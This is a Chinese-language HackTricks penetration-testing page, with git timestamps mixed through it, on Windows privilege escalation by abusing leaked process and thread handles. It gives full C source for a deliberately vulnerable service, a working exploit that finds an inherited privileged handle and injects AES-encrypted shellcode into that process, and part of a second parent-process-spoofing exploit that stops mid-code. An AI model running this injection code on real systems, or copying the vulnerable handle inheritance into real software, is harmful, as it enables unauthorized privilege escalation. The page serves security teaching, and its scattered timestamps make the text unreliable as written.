2023-08-03 19:12:22 +00:00
# 泄露句柄利用
2022-04-28 16:01:33 +00:00
< details >
2024-02-08 03:56:12 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-09 14:10:19 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-02-08 03:56:12 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
2024-02-09 01:27:24 +00:00
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**。**
2024-02-08 03:56:12 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-02-08 03:56:12 +00:00
## 简介
2022-03-21 11:02:30 +00:00
2024-01-09 14:10:19 +00:00
进程中的句柄允许**访问**不同的**Windows资源**:
2022-03-21 11:02:30 +00:00
2024-02-09 01:27:24 +00:00
![RootedCON2022 - 利用泄露句柄进行LPE ](<../../.gitbook/assets/image (663 ) (1).png>)
2022-03-21 11:02:30 +00:00
2024-02-08 03:56:12 +00:00
已经发生过几起**特权升级**案例,其中一个具有**打开和可继承句柄**的**特权进程**运行了一个**非特权进程**,使其能够**访问所有这些句柄**。
2022-03-21 11:02:30 +00:00
2024-02-09 01:27:24 +00:00
例如,想象一下,**一个以SYSTEM身份运行的进程打开了一个新进程**( `OpenProcess()`)并具有**完全访问权限**。同一进程**还创建了一个新进程**( `CreateProcess()`) **权限较低,但继承了主进程的所有打开句柄**。\
然后,如果您对权限较低的进程具有**完全访问权限**,您可以获取使用`OpenProcess()`创建的**特权进程的打开句柄**并**注入shellcode**。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
## **有趣的句柄**
2022-03-21 11:02:30 +00:00
2023-08-03 19:12:22 +00:00
### **进程**
2022-03-21 11:02:30 +00:00
2024-02-08 03:56:12 +00:00
如您在初始示例中所读,如果**非特权进程继承了具有足够权限的特权进程的进程句柄**,它将能够在其上执行**任意代码**。
2022-03-21 11:02:30 +00:00
2024-02-08 03:56:12 +00:00
在[**这篇优秀的文章**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)中,您可以看到如何利用具有以下权限之一的任何进程句柄:
2022-03-21 11:02:30 +00:00
* PROCESS\_ALL\_ACCESS
* PROCESS\_CREATE\_PROCESS
* PROCESS\_CREATE\_THREAD
* PROCESS\_DUP\_HANDLE
* PROCESS\_VM\_WRITE
2023-08-03 19:12:22 +00:00
### 线程
2022-03-21 11:02:30 +00:00
2024-02-08 03:56:12 +00:00
与进程句柄类似,如果**非特权进程继承了具有足够权限的特权进程的线程句柄**,它将能够在其上执行**任意代码**。
2022-03-21 11:02:30 +00:00
2024-02-08 03:56:12 +00:00
在[**这篇优秀的文章**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)中,您还可以看到如何利用具有以下权限之一的任何进程句柄:
2022-03-21 11:02:30 +00:00
* THREAD\_ALL\_ACCESS
* THREAD\_DIRECT\_IMPERSONATION
* THREAD\_SET\_CONTEXT
2024-02-08 03:56:12 +00:00
### 文件、密钥和节句柄
2022-03-21 11:02:30 +00:00
2024-02-09 01:27:24 +00:00
如果**非特权进程继承**具有**对特权文件或注册表的写入等效权限**的**句柄**,它将能够**覆盖**文件/注册表(并且有很多**运气**的话,**提升特权**)。
2020-07-15 15:43:14 +00:00
2024-02-09 01:27:24 +00:00
**节句柄**类似于文件句柄,这些对象的常见名称是**“文件映射”**。它们用于处理**大文件**而无需将整个文件保存在内存中。这使得利用有点类似于利用文件句柄。
2022-03-21 17:37:28 +00:00
2023-08-03 19:12:22 +00:00
## 如何查看进程的句柄
2022-03-21 17:37:28 +00:00
2022-07-11 08:44:04 +00:00
### Process Hacker
2022-03-21 17:37:28 +00:00
2024-02-09 01:27:24 +00:00
[**Process Hacker** ](https://github.com/processhacker/processhacker )是一个可免费下载的工具。它具有几个令人惊叹的选项来检查进程,其中之一是**查看每个进程的句柄**的功能。
2022-03-21 17:37:28 +00:00
2024-01-09 14:10:19 +00:00
请注意,为了**查看所有进程的所有句柄, 需要SeDebugPrivilege**( 因此您需要以管理员身份运行Process Hacker) 。
2022-03-21 17:37:28 +00:00
2024-01-09 14:10:19 +00:00
要查看进程的句柄,请右键单击进程并选择句柄:
2022-03-21 17:37:28 +00:00
2022-04-28 14:00:21 +00:00
![](< .. / . . / . gitbook / assets / image ( 651 ) ( 1 ) . png > )
2022-03-21 17:37:28 +00:00
2024-01-09 14:10:19 +00:00
然后,您可以右键单击句柄并**检查权限**:
2022-03-21 17:37:28 +00:00
![](< .. / . . / . gitbook / assets / image ( 628 ) . png > )
2024-02-08 03:56:12 +00:00
### Sysinternals Handles
2022-03-21 17:37:28 +00:00
2024-02-08 03:56:12 +00:00
来自Sysinternals的[**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)二进制文件还将在控制台中列出每个进程的句柄:
2022-03-21 17:37:28 +00:00
![](< .. / . . / . gitbook / assets / image ( 654 ) . png > )
2022-07-11 08:44:04 +00:00
### LeakedHandlesFinder
2022-03-21 17:38:42 +00:00
2024-02-08 03:56:12 +00:00
[**此工具** ](https://github.com/lab52io/LeakedHandlesFinder )允许您**监视**泄露的**句柄**,甚至**自动利用**它们以提升特权。
2022-03-21 17:38:42 +00:00
2023-08-03 19:12:22 +00:00
### 方法论
2022-03-21 17:37:28 +00:00
2024-02-08 03:56:12 +00:00
现在您知道如何查找进程的句柄,您需要检查的是是否有**非特权进程可以访问特权句柄**。在这种情况下,进程的用户可能能够获取句柄并滥用它以提升特权。
2022-03-21 17:37:28 +00:00
{% hint style="warning" %}
2024-02-09 01:27:24 +00:00
之前提到过, 您需要SeDebugPrivilege才能访问所有句柄。但是**用户仍然可以访问其进程的句柄**,因此如果您想要从该用户提升权限,使用用户常规权限**执行工具可能会很有用**。
2022-03-21 17:37:28 +00:00
```bash
handle64.exe /a | findstr /r /i "process thread file key pid:"
```
2024-02-09 01:27:24 +00:00
{% endhint %}
## Vulnerable Example
2020-07-15 15:43:14 +00:00
2024-02-09 01:27:24 +00:00
例如,以下代码属于一个**Windows服务**,存在漏洞。该服务二进制文件中的漏洞代码位于**`Exploit`**函数内。该函数开始**使用完全访问权限创建一个新的句柄进程**。然后,它**创建一个低权限进程**( 通过复制_explorer.exe_的低权限令牌) 执行_C:\users\username\desktop\client.exe_。**漏洞在于它使用`bInheritHandles`为`TRUE`创建低权限进程**。
2020-07-15 15:43:14 +00:00
2024-02-09 01:27:24 +00:00
因此, 这个低权限进程能够获取首先创建的高权限进程的句柄, 并注入和执行一个shellcode( 请参阅下一节) 。
2020-07-15 15:43:14 +00:00
```c
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#pragma comment (lib, "advapi32")
TCHAR* serviceName = TEXT("HandleLeakSrv");
SERVICE_STATUS serviceStatus;
SERVICE_STATUS_HANDLE serviceStatusHandle = 0;
HANDLE stopServiceEvent = 0;
//Find PID of a proces from its name
int FindTarget(const char *procname) {
2023-08-03 19:12:22 +00:00
HANDLE hProcSnap;
PROCESSENTRY32 pe32;
int pid = 0;
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
pe32.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(hProcSnap, & pe32)) {
CloseHandle(hProcSnap);
return 0;
2020-07-15 15:43:14 +00:00
}
2023-08-03 19:12:22 +00:00
while (Process32Next(hProcSnap, & pe32)) {
if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
pid = pe32.th32ProcessID;
break;
}
}
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
CloseHandle(hProcSnap);
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
return pid;
}
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
int Exploit(void) {
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
STARTUPINFOA si;
PROCESS_INFORMATION pi;
int pid = 0;
HANDLE hUserToken;
HANDLE hUserProc;
HANDLE hProc;
// open a handle to itself (privileged process) - this gets leaked!
hProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
// get PID of user low privileged process
if ( pid = FindTarget("explorer.exe") )
hUserProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
else
return -1;
// extract low privilege token from a user's process
if (!OpenProcessToken(hUserProc, TOKEN_ALL_ACCESS, & hUserToken)) {
CloseHandle(hUserProc);
return -1;
}
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
// spawn a child process with low privs and leaked handle
ZeroMemory(& si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(& pi, sizeof(pi));
CreateProcessAsUserA(hUserToken, "C:\\users\\username\\Desktop\\client.exe",
NULL, NULL, NULL, TRUE, 0, NULL, NULL, & si, &pi);
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
CloseHandle(hProc);
CloseHandle(hUserProc);
return 0;
2020-07-15 15:43:14 +00:00
}
2023-08-03 19:12:22 +00:00
void WINAPI ServiceControlHandler( DWORD controlCode ) {
switch ( controlCode ) {
case SERVICE_CONTROL_SHUTDOWN:
case SERVICE_CONTROL_STOP:
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
SetServiceStatus( serviceStatusHandle, & serviceStatus );
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
SetEvent( stopServiceEvent );
return;
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
case SERVICE_CONTROL_PAUSE:
break;
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
case SERVICE_CONTROL_CONTINUE:
break;
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
case SERVICE_CONTROL_INTERROGATE:
break;
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
default:
break;
}
SetServiceStatus( serviceStatusHandle, & serviceStatus );
}
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {
// initialise service status
serviceStatus.dwServiceType = SERVICE_WIN32;
serviceStatus.dwCurrentState = SERVICE_STOPPED;
serviceStatus.dwControlsAccepted = 0;
serviceStatus.dwWin32ExitCode = NO_ERROR;
serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;
serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );
if ( serviceStatusHandle ) {
// service is starting
serviceStatus.dwCurrentState = SERVICE_START_PENDING;
SetServiceStatus( serviceStatusHandle, & serviceStatus );
// do initialisation here
stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );
// running
serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
serviceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus( serviceStatusHandle, & serviceStatus );
Exploit();
WaitForSingleObject( stopServiceEvent, -1 );
// service was stopped
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
SetServiceStatus( serviceStatusHandle, & serviceStatus );
// do cleanup here
CloseHandle( stopServiceEvent );
stopServiceEvent = 0;
// service is now stopped
serviceStatus.dwControlsAccepted & = ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
serviceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus( serviceStatusHandle, & serviceStatus );
}
2020-07-15 15:43:14 +00:00
}
void InstallService() {
2023-08-03 19:12:22 +00:00
SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );
if ( serviceControlManager ) {
TCHAR path[ _MAX_PATH + 1 ];
if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
SC_HANDLE service = CreateService( serviceControlManager,
serviceName, serviceName,
SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
0, 0, 0, 0, 0 );
if ( service )
CloseServiceHandle( service );
}
CloseServiceHandle( serviceControlManager );
}
2020-07-15 15:43:14 +00:00
}
void UninstallService() {
2023-08-03 19:12:22 +00:00
SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );
if ( serviceControlManager ) {
SC_HANDLE service = OpenService( serviceControlManager,
serviceName, SERVICE_QUERY_STATUS | DELETE );
if ( service ) {
SERVICE_STATUS serviceStatus;
if ( QueryServiceStatus( service, & serviceStatus ) ) {
if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
DeleteService( service );
}
CloseServiceHandle( service );
}
CloseServiceHandle( serviceControlManager );
}
2020-07-15 15:43:14 +00:00
}
int _tmain( int argc, TCHAR* argv[] )
{
2023-08-03 19:12:22 +00:00
if ( argc > 1 & & lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
InstallService();
}
else if ( argc > 1 & & lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
UninstallService();
}
else {
SERVICE_TABLE_ENTRY serviceTable[] = {
{ serviceName, ServiceMain },
{ 0, 0 }
};
StartServiceCtrlDispatcher( serviceTable );
2020-07-15 15:43:14 +00:00
}
2023-08-03 19:12:22 +00:00
return 0;
}
```
2024-01-09 14:10:19 +00:00
### 漏洞利用示例 1
2020-07-15 15:43:14 +00:00
{% hint style="info" %}
2024-02-08 03:56:12 +00:00
在实际情况中,您可能**无法控制**由易受攻击的代码执行的二进制文件( 在本例中为_C:\users\username\desktop\client.exe_) 。您可能会** compromise 一个进程,然后需要查看是否可以访问任何特权进程的易受攻击句柄**。
2020-07-15 15:43:14 +00:00
{% endhint %}
2024-02-09 01:27:24 +00:00
在这个示例中,您可以找到一个可能的用于 _C:\users\username\desktop\client.exe_ 的利用代码。\
这段代码中最有趣的部分位于 `GetVulnProcHandle` 。此函数将**开始获取所有句柄**,然后它将**检查它们中是否有任何属于相同 PID** 且句柄属于**进程**。如果所有这些要求都满足(找到一个可访问的打开进程句柄),它将尝试**注入和执行 shellcode 以滥用进程的句柄**。\
2024-02-08 03:56:12 +00:00
shellcode 的注入是在**`Inject`**函数内完成的,它将**将 shellcode 写入特权进程并在同一进程内创建一个线程来执行 shellcode**。
2020-07-15 15:43:14 +00:00
```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <wincrypt.h>
#include <psapi.h>
#include <tchar.h>
#include <tlhelp32.h>
#include "client.h"
#pragma comment (lib, "crypt32.lib")
#pragma comment (lib, "advapi32")
#pragma comment (lib, "kernel32")
int AESDecrypt(char * payload, unsigned int payload_len, char * key, size_t keylen) {
2023-08-03 19:12:22 +00:00
HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;
if (!CryptAcquireContextW(& hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
return -1;
}
if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, & hHash)){
return -1;
}
if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
return -1;
}
if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,& hKey)){
return -1;
}
if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, payload, & payload_len)){
return -1;
}
CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);
return 0;
2020-07-15 15:43:14 +00:00
}
HANDLE GetVulnProcHandle(void) {
2023-08-03 19:12:22 +00:00
ULONG handleInfoSize = 0x10000;
NTSTATUS status;
PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);
HANDLE hProc = NULL;
POBJECT_TYPE_INFORMATION objectTypeInfo;
PVOID objectNameInfo;
UNICODE_STRING objectName;
ULONG returnLength;
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
DWORD dwOwnPID = GetCurrentProcessId();
pNtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
pNtDuplicateObject = GetProcAddress(hNtdll, "NtDuplicateObject");
pNtQueryObject = GetProcAddress(hNtdll, "NtQueryObject");
pRtlEqualUnicodeString = GetProcAddress(hNtdll, "RtlEqualUnicodeString");
pRtlInitUnicodeString = GetProcAddress(hNtdll, "RtlInitUnicodeString");
printf("[+] Grabbing handles...");
while ((status = pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,
NULL )) == STATUS_INFO_LENGTH_MISMATCH)
phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *= 2);
if (status != STATUS_SUCCESS)
{
printf("[!] NtQuerySystemInformation failed!\n");
return 0;
}
printf("done.\n[+] Fetched %d handles.\n", phHandleInfo->NumberOfHandles);
// iterate handles until we find the privileged process handle
for (int i = 0; i < phHandleInfo- > NumberOfHandles; ++i)
{
SYSTEM_HANDLE_TABLE_ENTRY_INFO handle = phHandleInfo->Handles[i];
// Check if this handle belongs to our own process
if (handle.UniqueProcessId != dwOwnPID)
continue;
objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);
if (pNtQueryObject( (HANDLE) handle.HandleValue,
ObjectTypeInformation,
objectTypeInfo,
0x1000,
NULL ) != STATUS_SUCCESS)
continue;
// skip some objects to avoid getting stuck
// see: https://github.com/adamdriscoll/PoshInternals/issues/7
if (handle.GrantedAccess == 0x0012019f
& & handle.GrantedAccess != 0x00120189
& & handle.GrantedAccess != 0x120089
& & handle.GrantedAccess != 0x1A019F ) {
free(objectTypeInfo);
continue;
}
// get object name information
objectNameInfo = malloc(0x1000);
if (pNtQueryObject( (HANDLE) handle.HandleValue,
ObjectNameInformation,
objectNameInfo,
0x1000,
& returnLength ) != STATUS_SUCCESS) {
// adjust the size of a returned object and query again
objectNameInfo = realloc(objectNameInfo, returnLength);
if (pNtQueryObject( (HANDLE) handle.HandleValue,
ObjectNameInformation,
objectNameInfo,
returnLength,
NULL ) != STATUS_SUCCESS) {
free(objectTypeInfo);
free(objectNameInfo);
continue;
}
}
// check if we've got a process object
objectName = *(PUNICODE_STRING) objectNameInfo;
UNICODE_STRING pProcess;
pRtlInitUnicodeString(& pProcess, L"Process");
if (pRtlEqualUnicodeString(& objectTypeInfo->TypeName, & pProcess, TRUE)) {
printf("[+] Found process handle (%x)\n", handle.HandleValue);
hProc = (HANDLE) handle.HandleValue;
free(objectTypeInfo);
free(objectNameInfo);
break;
}
else
continue;
free(objectTypeInfo);
free(objectNameInfo);
}
return hProc;
}
2020-07-15 15:43:14 +00:00
int Inject(HANDLE hProc, unsigned char * payload, unsigned int payload_len) {
2023-08-03 19:12:22 +00:00
LPVOID pRemoteCode = NULL;
HANDLE hThread = NULL;
BOOL bStatus = FALSE;
pVirtualAllocEx = GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualAllocEx");
pWriteProcessMemory = GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory");
pRtlCreateUserThread = GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlCreateUserThread");
pRemoteCode = pVirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
pWriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T *)NULL);
bStatus = (BOOL) pRtlCreateUserThread(hProc, NULL, 0, 0, 0, 0, pRemoteCode, NULL, & hThread, NULL);
if (bStatus != FALSE) {
WaitForSingleObject(hThread, -1);
CloseHandle(hThread);
return 0;
}
else
return -1;
2020-07-15 15:43:14 +00:00
}
int main(int argc, char **argv) {
2023-08-03 19:12:22 +00:00
int pid = 0;
HANDLE hProc = NULL;
// AES encrypted shellcode spawning notepad.exe (ExitThread)
char key[] = { 0x49, 0xbc, 0xa5, 0x1d, 0xa7, 0x3d, 0xd6, 0x0, 0xee, 0x2, 0x29, 0x3e, 0x9b, 0xb2, 0x8a, 0x69 };
unsigned char payload[] = { 0x6b, 0x98, 0xe8, 0x38, 0xaf, 0x82, 0xdc, 0xd4, 0xda, 0x57, 0x15, 0x48, 0x2f, 0xf0, 0x4e, 0xd3, 0x1a, 0x70, 0x6d, 0xbf, 0x53, 0xa8, 0xcb, 0xbb, 0xbb, 0x38, 0xf6, 0x4e, 0xee, 0x84, 0x36, 0xe5, 0x25, 0x76, 0xce, 0xb0, 0xf6, 0x39, 0x22, 0x76, 0x36, 0x3c, 0xe1, 0x13, 0x18, 0x9d, 0xb1, 0x6e, 0x0, 0x55, 0x8a, 0x4f, 0xb8, 0x2d, 0xe7, 0x6f, 0x91, 0xa8, 0x79, 0x4e, 0x34, 0x88, 0x24, 0x61, 0xa4, 0xcf, 0x70, 0xdb, 0xef, 0x25, 0x96, 0x65, 0x76, 0x7, 0xe7, 0x53, 0x9, 0xbf, 0x2d, 0x92, 0x25, 0x4e, 0x30, 0xa, 0xe7, 0x69, 0xaf, 0xf7, 0x32, 0xa6, 0x98, 0xd3, 0xbe, 0x2b, 0x8, 0x90, 0x0, 0x9e, 0x3f, 0x58, 0xed, 0x21, 0x69, 0xcb, 0x38, 0x5d, 0x5e, 0x68, 0x5e, 0xb9, 0xd6, 0xc5, 0x92, 0xd1, 0xaf, 0xa2, 0x5d, 0x16, 0x23, 0x48, 0xbc, 0xdd, 0x2a, 0x9f, 0x3c, 0x22, 0xdb, 0x19, 0x24, 0xdf, 0x86, 0x4a, 0xa2, 0xa0, 0x8f, 0x1a, 0xe, 0xd6, 0xb7, 0xd2, 0x6c, 0x6d, 0x90, 0x55, 0x3e, 0x7d, 0x9b, 0x69, 0x87, 0xad, 0xd7, 0x5c, 0xf3, 0x1, 0x7c, 0x93, 0x1d, 0xaa, 0x40, 0xf, 0x15, 0x48, 0x5b, 0xad, 0x6, 0xb5, 0xe5, 0xb9, 0x92, 0xae, 0x9b, 0xdb, 0x9a, 0x9b, 0x4e, 0x44, 0x45, 0xdb, 0x9f, 0x28, 0x90, 0x9e, 0x63, 0x23, 0xf2, 0xca, 0xab, 0xa7, 0x68, 0xbc, 0x31, 0xb4, 0xf9, 0xbb, 0x73, 0xd4, 0x56, 0x94, 0x2c, 0x63, 0x47, 0x21, 0x84, 0xa2, 0xb6, 0x91, 0x23, 0x8f, 0xa0, 0x46, 0x76, 0xff, 0x3f, 0x75, 0xd, 0x51, 0xc5, 0x70, 0x26, 0x1, 0xcf, 0x23, 0xbf, 0x97, 0xb2, 0x8d, 0x66, 0x35, 0xc8, 0xe3, 0x2, 0xf6, 0xbd, 0x44, 0x83, 0xf2, 0x80, 0x4c, 0xd0, 0x7d, 0xa3, 0xbd, 0x33, 0x8e, 0xe8, 0x6, 0xbc, 0xdc, 0xff, 0xe0, 0x96, 0xd9, 0xdc, 0x87, 0x2a, 0x81, 0xf3, 0x53, 0x37, 0x16, 0x3a, 0xcc, 0x3c, 0x34, 0x4, 0x9c, 0xc6, 0xbb, 0x12, 0x72, 0xf3, 0xa3, 0x94, 0x5d, 0x19, 0x43, 0x56, 0xa8, 0xba, 0x2a, 0x1d, 0x12, 0xeb, 0xd2, 0x6e, 0x79, 0x65, 0x2a };
unsigned int payload_len = sizeof(payload);
2024-01-09 14:10:19 +00:00
printf("My PID: %d\n", GetCurrentProcessId());
2023-08-03 19:12:22 +00:00
getchar();
2024-01-09 14:10:19 +00:00
// find a leaked handle to a process
2023-08-03 19:12:22 +00:00
hProc = GetVulnProcHandle();
2024-01-09 14:10:19 +00:00
if ( hProc != NULL) {
2023-08-03 19:12:22 +00:00
2024-01-09 14:10:19 +00:00
// d#Decrypt payload
AESDecrypt((char *) payload, payload_len, key, sizeof(key));
printf("[+] Sending gift...");
// Inject and run the payload in the privileged context
2023-08-03 19:12:22 +00:00
Inject(hProc, payload, payload_len);
2024-01-09 14:10:19 +00:00
printf("done.\n");
2020-07-15 15:43:14 +00:00
}
2023-08-03 19:12:22 +00:00
getchar();
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
return 0;
}
```
2024-01-09 14:10:19 +00:00
### 漏洞利用示例 2
2020-07-15 15:43:14 +00:00
{% hint style="info" %}
2024-02-09 01:27:24 +00:00
在实际情况中,您可能**无法控制**由易受攻击的代码执行的二进制文件( 在本例中为_C:\users\username\desktop\client.exe_) 。您可能会** compromise 一个进程,然后需要查看是否可以访问任何特权进程的易受攻击句柄**。
2020-07-15 15:43:14 +00:00
{% endhint %}
2024-02-08 03:56:12 +00:00
在这个示例中,**不是滥用打开的句柄来注入**和执行 shellcode, 而是**使用特权打开句柄进程的令牌来创建一个新的**。这是在第 138 到 148 行完成的。
2020-07-15 15:43:14 +00:00
2024-02-09 01:27:24 +00:00
请注意,**函数 `UpdateProcThreadAttribute` ** 是与**属性 `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` 和打开的特权进程句柄一起使用**的。这意味着执行 \_cmd.exe 的**创建的进程线程**将具有与打开句柄进程相同的令牌权限。
2020-07-15 15:43:14 +00:00
```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <wincrypt.h>
#include <psapi.h>
#include <tchar.h>
#include <tlhelp32.h>
#include "client.h"
#pragma comment (lib, "crypt32.lib")
#pragma comment (lib, "advapi32")
#pragma comment (lib, "kernel32")
HANDLE GetVulnProcHandle(void) {
2023-08-03 19:12:22 +00:00
ULONG handleInfoSize = 0x10000;
NTSTATUS status;
PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);
HANDLE hProc = NULL;
POBJECT_TYPE_INFORMATION objectTypeInfo;
PVOID objectNameInfo;
UNICODE_STRING objectName;
ULONG returnLength;
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
DWORD dwOwnPID = GetCurrentProcessId();
pNtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
pNtDuplicateObject = GetProcAddress(hNtdll, "NtDuplicateObject");
pNtQueryObject = GetProcAddress(hNtdll, "NtQueryObject");
pRtlEqualUnicodeString = GetProcAddress(hNtdll, "RtlEqualUnicodeString");
pRtlInitUnicodeString = GetProcAddress(hNtdll, "RtlInitUnicodeString");
printf("[+] Grabbing handles...");
while ((status = pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,
NULL )) == STATUS_INFO_LENGTH_MISMATCH)
phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *= 2);
if (status != STATUS_SUCCESS)
{
printf("[!] NtQuerySystemInformation failed!\n");
return 0;
}
printf("done.\n[+] Fetched %d handles.\n", phHandleInfo->NumberOfHandles);
// iterate handles until we find the privileged process handle
for (int i = 0; i < phHandleInfo- > NumberOfHandles; ++i)
{
SYSTEM_HANDLE_TABLE_ENTRY_INFO handle = phHandleInfo->Handles[i];
// Check if this handle belongs to our own process
if (handle.UniqueProcessId != dwOwnPID)
continue;
objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);
if (pNtQueryObject( (HANDLE) handle.HandleValue,
ObjectTypeInformation,
objectTypeInfo,
0x1000,
NULL ) != STATUS_SUCCESS)
continue;
// skip some objects to avoid getting stuck
// see: https://github.com/adamdriscoll/PoshInternals/issues/7
if (handle.GrantedAccess == 0x0012019f
& & handle.GrantedAccess != 0x00120189
& & handle.GrantedAccess != 0x120089
& & handle.GrantedAccess != 0x1A019F ) {
free(objectTypeInfo);
continue;
}
// get object name information
objectNameInfo = malloc(0x1000);
if (pNtQueryObject( (HANDLE) handle.HandleValue,
ObjectNameInformation,
objectNameInfo,
0x1000,
& returnLength ) != STATUS_SUCCESS) {
// adjust the size of a returned object and query again
objectNameInfo = realloc(objectNameInfo, returnLength);
if (pNtQueryObject( (HANDLE) handle.HandleValue,
ObjectNameInformation,
objectNameInfo,
returnLength,
NULL ) != STATUS_SUCCESS) {
free(objectTypeInfo);
free(objectNameInfo);
continue;
}
}
// check if we've got a process object
objectName = *(PUNICODE_STRING) objectNameInfo;
UNICODE_STRING pProcess;
pRtlInitUnicodeString(& pProcess, L"Process");
if (pRtlEqualUnicodeString(& objectTypeInfo->TypeName, & pProcess, TRUE)) {
printf("[+] Found process handle (%x)\n", handle.HandleValue);
hProc = (HANDLE) handle.HandleValue;
free(objectTypeInfo);
free(objectNameInfo);
break;
}
else
continue;
free(objectTypeInfo);
free(objectNameInfo);
}
return hProc;
}
2020-07-15 15:43:14 +00:00
int main(int argc, char **argv) {
2023-08-03 19:12:22 +00:00
HANDLE hProc = NULL;
STARTUPINFOEXA si;
PROCESS_INFORMATION pi;
int pid = 0;
SIZE_T size;
BOOL ret;
Sleep(20000);
// find leaked process handle
